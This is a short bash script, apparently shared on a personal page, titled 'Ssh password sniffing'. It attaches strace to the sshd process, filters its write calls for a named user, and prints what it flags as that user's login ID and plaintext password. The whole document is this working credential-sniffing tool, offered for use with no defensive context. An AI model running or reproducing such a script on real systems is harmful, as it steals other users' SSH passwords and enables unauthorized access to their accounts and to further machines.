Ssh password sniffing

sshsnoop.sh

#! /bin/bash
#
# Cheap technique. :) by YoungJoo.Kim <http://vozlt.com> 
#
#
 
SNOOP_ID=$1
SSHD_PPID=$(pgrep -o sshd)
MATCH_ID=
MATCH_PID=
MATCH_ID_PID=
 
FIND_PASSWD=0
PASSWD_NEXT=15
 
FILTER_PASSWD_LEN_MIN=40
FILTER_PASSWD_LEN_MAX=80
 
SCOPE=10
SCOPE_MIN=
SCOPE_MAX=
LOOP_COUNT=0
((SCOPE_MIN=PASSWD_NEXT-SCOPE))
((SCOPE_MAX=PASSWD_NEXT+SCOPE))
 
if [ -z $SNOOP_ID ]; then
    echo $"Usage: $0 {snoopid}" 
    exit 0
fi
 
strace -f -etrace=write -s 64 -p $SSHD_PPID 2>&1 | while read SSH
do
 
    if [ $LOOP_COUNT -ge $SCOPE_MIN -a $LOOP_COUNT -le $SCOPE_MAX ]; then
        MATCH_PID=$(echo $SSH 2>&1 | grep $MATCH_ID_PID | grep -v ssh-connection)
        if [ -n "$MATCH_PID" -a ${#SSH} -lt $FILTER_PASSWD_LEN_MAX -a ${#SSH} -gt $FILTER_PASSWD_LEN_MIN ]; then
            echo "MAY BE PASSWORD >>> $SSH"
        fi
    fi
 
    if [ $LOOP_COUNT -eq $SCOPE_MAX ]; then
        LOOP_COUNT=0
        FIND_PASSWD=0
        MATCH_ID=
    fi
 
    if [ $FIND_PASSWD -gt "0" ]; then
        ((FIND_PASSWD++))
        ((LOOP_COUNT++))
        continue
    fi
    MATCH_ID=$(echo $SSH 2>&1 | grep $SNOOP_ID\")
    if [ -n "$MATCH_ID" ]; then
        echo "MAY BE USERID   >>> $SSH"
        MATCH_ID_PID=${SSH%%]*}
        MATCH_ID_PID=${MATCH_ID_PID#[pid}
        FIND_PASSWD=1
    fi
done